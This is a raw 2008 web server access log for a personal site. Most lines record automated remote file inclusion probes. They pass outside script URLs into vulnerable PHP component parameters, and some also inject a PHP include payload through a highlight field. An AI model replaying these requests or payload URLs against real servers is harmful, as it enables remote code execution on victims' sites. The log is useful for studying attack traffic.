66.230.204.130 - - [14/Jul/2008:12:57:30 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/ceasca/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
66.230.204.130 - - [14/Jul/2008:12:57:31 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.230.204.130 - - [14/Jul/2008:12:57:31 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/ceasca/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
66.230.204.130 - - [14/Jul/2008:12:57:31 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
63.246.64.173 - - [14/Jul/2008:12:58:10 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/ceasca/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
63.246.64.173 - - [14/Jul/2008:12:58:11 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/ceasca/c.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
63.246.64.173 - - [14/Jul/2008:12:58:11 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
63.246.64.173 - - [14/Jul/2008:12:58:13 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:12:58:22 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:12:58:22 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:12:58:22 -0700] "GET /logs/access_080329.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.53.163 - - [14/Jul/2008:12:58:22 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://members.lycos.co.uk/carderz/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:12:58:42 -0700] "GET /logs/access_071225.log//%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:58:58 -0700] "GET /logs/access_080329.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:58:59 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:59:00 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:59:07 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:59:07 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:59:08 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:12:59:34 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:12:59:35 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://arabhack.110mb.com/kngid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:59:46 -0700] "GET /logs/access_080207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:59:46 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:12:59:46 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:59:53 -0700] "GET /logs/access_080207.log//zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:59:53 -0700] "GET //zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:12:59:53 -0700] "GET /logs//zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:13:00:05 -0700] "GET /logs//components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.19.67.108 - - [14/Jul/2008:13:00:05 -0700] "GET //components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.56.116 - - [14/Jul/2008:13:00:12 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:00:17 -0700] "GET /logs/access_071224.log//zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.3.2.99 - - [14/Jul/2008:13:00:28 -0700] "GET /logs/access_071225.log//%7Ekslim/bbs//skin/zero_vote/error.php?dir=http://www.geocities.com/anangedan.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.154.27 - - [14/Jul/2008:13:00:39 -0700] "GET /logs/access_080425.log/errors.php?error=http://queb3.info/cruise/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.195.37.125 - - [14/Jul/2008:13:01:15 -0700] "GET /blog/index.php/2008/06/07/ HTTP/1.0" 200 8148 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [14/Jul/2008:13:01:16 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/blog/2008/06/07/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [14/Jul/2008:13:01:16 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/blog/2008/06/07/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [14/Jul/2008:13:01:16 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/blog/2008/06/07/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.19.107.26 - - [14/Jul/2008:13:01:21 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.246 - - [14/Jul/2008:13:01:26 -0700] "GET /bikes/dteel/2008_02_07/?M=D HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.107.26 - - [14/Jul/2008:13:01:32 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.26 - - [14/Jul/2008:13:01:32 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.107.26 - - [14/Jul/2008:13:01:32 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [14/Jul/2008:13:01:57 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/fexcia/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:13:02:09 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:13:02:12 -0700] "GET /logs//?p=http://alieandrann.net/id.txt??? HTTP/1.1" 200 56141 "-" "libwww-perl/5.813" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:13:02:39 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:13:02:39 -0700] "GET /logs/access.log/components/com_joomlaboard/file_upload.php?sbp=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [14/Jul/2008:13:02:41 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.printunion.ru/images/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:02:51 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:02:51 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:02:55 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:02:55 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:02:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.137 - - [14/Jul/2008:13:02:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/boy_nozz/taf/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:03:04 -0700] "GET /logs/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [14/Jul/2008:13:03:05 -0700] "GET /vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:13:03:11 -0700] "GET /logs//?pg=http://alieandrann.net/id.txt??? HTTP/1.1" 200 56141 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:13:03:16 -0700] "GET //?pg=http://alieandrann.net/id.txt??? HTTP/1.1" 200 18351 "-" "libwww-perl/5.813" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:13:03:21 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [14/Jul/2008:13:03:22 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.253.72 - - [14/Jul/2008:13:03:22 -0700] "GET /logs/access_080313.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:03:24 -0700] "GET //zero_vote/ask_password.php?dir=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.26 - - [14/Jul/2008:13:03:53 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.thelostknightsguild.com/tmp/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:13:04:08 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:13:04:08 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.91.99.14 - - [14/Jul/2008:13:04:33 -0700] "GET /logs/access.log/errors.php?error=http://okdy.co.kr/zb41pl4/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [14/Jul/2008:13:04:34 -0700] "GET /errors.php?error=http://okdy.co.kr/zb41pl4/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [14/Jul/2008:13:04:35 -0700] "GET /logs/errors.php?error=http://okdy.co.kr/zb41pl4/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.248 - - [14/Jul/2008:13:04:43 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.248 - - [14/Jul/2008:13:04:49 -0700] "GET /logs/index.php?sourcedir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.248 - - [14/Jul/2008:13:04:49 -0700] "GET /index.php?sourcedir=http://lizartdisplay.com/di?? HTTP/1.1" 200 18371 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:13:05:02 -0700] "GET /logs/access_080128.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:13:05:02 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:13:05:02 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.18.175.101 - - [14/Jul/2008:13:05:22 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://82.104.27.132:25254/stp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:05:25 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:05:25 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:05:25 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.201.18 - - [14/Jul/2008:13:05:25 -0700] "GET /logs/access_080207.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [14/Jul/2008:13:05:25 -0700] "GET /errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [14/Jul/2008:13:05:26 -0700] "GET /logs/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:05:34 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:13:05:42 -0700] "GET /logs/access_080329.log//squirrelcart/cart_content.php?cart_isp_root=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.19 - - [14/Jul/2008:13:05:47 -0700] "GET /bikes/dteel/2008_01_27/Medium/?D=A HTTP/1.1" 200 4825 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.113.5.226 - - [14/Jul/2008:13:05:49 -0700] "GET /bikes/Picture051.avi HTTP/1.1" 200 15678320 "http://www.st-owners.com/forums/showthread.php?t=43885" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15" "www.dmulk.com"
193.91.99.14 - - [14/Jul/2008:13:05:52 -0700] "GET /logs/access_071225.log/errors.php?error=http://okdy.co.kr/zb41pl4/idrox.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [14/Jul/2008:13:06:12 -0700] "GET /logs/access_080218.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.degorzen.nl/Joomla/mambots/editors/htmlarea2/popups/albid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.119.200.248 - - [14/Jul/2008:13:06:32 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.201.18 - - [14/Jul/2008:13:07:01 -0700] "GET /logs/access.log/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.55.211.26 - - [14/Jul/2008:13:07:10 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
87.119.200.248 - - [14/Jul/2008:13:07:15 -0700] "GET /logs/index.php?sourcedir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.119.200.248 - - [14/Jul/2008:13:07:41 -0700] "GET /index.php?sourcedir=http://lizartdisplay.com/di?? HTTP/1.1" 200 18388 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:07:48 -0700] "GET /logs/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.225.214.141 - - [14/Jul/2008:13:07:48 -0700] "GET /page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:07:52 -0700] "GET /logs/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.29.107 - - [14/Jul/2008:13:07:52 -0700] "GET /page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.79.246.241 - - [14/Jul/2008:13:07:59 -0700] "GET /logs/?sourcedir=http://maringgai.t35.com/load.txt?? HTTP/1.1" 200 56136 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
65.55.211.26 - - [14/Jul/2008:13:08:02 -0700] "GET /blog/index.php/2008/06/?show=slide&nggpage=3 HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.26 - - [14/Jul/2008:13:08:37 -0700] "GET /blog/index.php/2008/06/?show=slide&nggpage=3 HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
77.79.246.241 - - [14/Jul/2008:13:08:37 -0700] "GET /?sourcedir=http://maringgai.t35.com/load.txt?? HTTP/1.1" 200 18382 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
77.221.130.5 - - [14/Jul/2008:13:09:27 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:13:09:39 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:13:09:40 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:13:09:50 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.31.24.64 - - [14/Jul/2008:13:09:59 -0700] "GET /errors.php?error=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:10:28 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [14/Jul/2008:13:10:28 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.5 - - [14/Jul/2008:13:10:53 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:13:11:38 -0700] "GET /logs/home.php?pagina=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:13:11:42 -0700] "GET /home.php?pagina=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.92.144.58 - - [14/Jul/2008:13:11:49 -0700] "GET /logs/page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.144.58 - - [14/Jul/2008:13:11:50 -0700] "GET /page.php5?id=http://cusenza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.101.157.249 - - [14/Jul/2008:13:11:53 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
75.101.157.249 - - [14/Jul/2008:13:11:53 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:13:12:02 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
